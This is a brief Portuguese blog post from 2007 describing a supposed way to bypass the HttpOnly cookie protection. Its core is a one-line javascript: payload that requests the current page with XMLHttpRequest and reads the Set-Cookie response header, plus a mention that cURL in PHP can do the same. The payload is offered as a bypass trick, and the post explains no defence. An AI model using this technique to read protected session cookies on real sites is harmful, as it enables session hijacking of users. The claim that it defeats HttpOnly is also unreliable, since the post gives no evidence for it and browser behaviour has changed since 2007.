segunda-feira, 17 de setembro de 2007

Burlando HttpOnly com Ajax

Muito tempo eu estava tentando burlar o HttpOnly, percebi que os cookies passam por Headers, então feito um script em Ajax que pega os Cookies, é possível também fazer com cURL em PHP.

Em Ajax JavaScript: javascript:a=new XMLHttpRequest;a.open("GET", location, false);a.send(0);alert(a.getResponseHeader("Set-Cookie"));void ( 0 )

É possível também usando Headers !


By: Ali

Nenhum comentário: